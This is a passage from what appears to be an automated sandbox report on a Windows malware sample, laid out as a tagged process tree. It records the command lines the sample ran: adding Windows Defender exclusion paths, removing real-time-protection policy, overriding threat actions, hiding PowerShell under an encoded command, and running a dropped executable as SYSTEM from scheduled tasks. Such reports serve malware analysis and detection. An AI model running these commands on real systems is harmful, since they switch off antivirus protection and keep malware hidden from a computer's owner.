                                                                                                                                          4⤵
                                                                                                                                          • Windows security bypass
                                                                                                                                          PID:4020
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4036
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            4⤵
                                                                                                                                              PID:4048
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4060
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2736
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\BTRMmzdQ\lLXOGClXoGhwIvxf.wsf"
                                                                                                                                              3⤵
                                                                                                                                                PID:3448
                                                                                                                                              • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\BTRMmzdQ\lLXOGClXoGhwIvxf.wsf"
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4072
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3888
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3948
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3292
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2856
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2368
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:860
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2488
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3032
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:772
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3296
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1720
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3116
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3092
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3360
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3384
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3336
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2296
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3412
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2248
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3380
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2188
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3944
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3576
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:996
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                          PID:408
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1712
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                            PID:560
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            4⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4012
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4044
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3228
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4064
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  4⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3940
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:920
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:3992
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2552
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1416
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /CREATE /TN "gyfMtaWaT" /SC once /ST 10:55:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:552
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /run /I /tn "gyfMtaWaT"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:852
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "gyfMtaWaT"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3388
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2612
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:3240
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:620
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2556
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 03:39:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\NewJYXR.exe\" 9Z /IFepdidgE 385121 /S" /V1 /F
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3576
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:996
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 572
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Program crash
                                                                                                                                                                              PID:408
                                                                                                                                                                          • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\NewJYXR.exe
                                                                                                                                                                            C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\NewJYXR.exe 9Z /IFepdidgE 385121 /S
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:3852
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:4016
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                PID:4024
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2736
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4040
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:3980
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:3460
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1628
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                      PID:4000
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:3888
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:900
                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                        PID:4056
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:3964
                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:4068
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                            PID:824
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:4092
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:920
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2368
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:784
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                  PID:2548
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:2880
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
